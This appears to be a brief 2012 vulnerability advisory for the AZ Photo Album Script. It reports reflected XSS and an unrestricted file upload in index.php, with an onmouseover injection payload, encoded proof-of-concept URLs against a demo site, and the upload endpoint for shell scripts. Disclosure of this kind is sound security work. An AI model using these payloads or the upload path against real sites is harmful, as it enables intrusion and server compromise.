# Exploit Title: AZ Photo Album Script Multiple Vulnerability
# Date: 2012
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr


ISSUE

XSS can be done using the command input and shell script upload

Vulnerable Page:
index.php (File Upload - XSS)


Example:
#" onmouseover=document.write("google.com") (For XSS)
index.php/?gazpart=suggest (For File Upload)


POC:
http://www.php4script.com/demo/php-photo-album-script/index.php/%F6%22%20onmouseover=document.write%28%22google.com%22%29%20

http://www.php4script.com/demo/php-photo-album-script/index.php/?gazpart=suggest


Thanks,

Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr